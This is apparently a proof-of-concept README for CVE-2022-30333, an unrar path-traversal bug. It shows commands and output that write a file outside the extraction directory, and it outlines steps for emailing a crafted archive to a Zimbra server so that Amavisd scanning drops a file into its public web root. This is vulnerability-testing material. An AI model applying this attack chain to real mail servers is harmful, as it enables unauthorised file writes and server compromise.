TheL1ghtVn / CVE-2022-30333-PoC


CVE-2022-30333-POC

Sample files to test CVE-2022-30333

  • Sample.rar : for testing on Linux. When extracted, it creates trav in ../../tmp/traversed. Make sure the directory ../../tmp/traversed exists before extracting Sample.rar.

  • exp.rar : for testing on a Zimbra mail server. When extracted, it creates moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/. You can access this file at https://zimbra_mail_domain/public/moo.txt

EXPLOITATION STEPS

Testing on Linux

mkdir ../../tmp/traversed (the destination folder must exist before running unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Testing on Zimbra

  • Create an email, attach the malicious rar file, and send it to a Zimbra email address. The rar file will be extracted while being analyzed by Amavisd.
  • The moo.txt should be at: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt or https://zimbra_mail_domain/public/moo.txt

REFERENCES

  1. Vietnamese blog from DEV2SEC
  2. English blog from Sonarsource
  3. Special thanks to mrlihd for helping me rebuild attack-chain in Zimbra
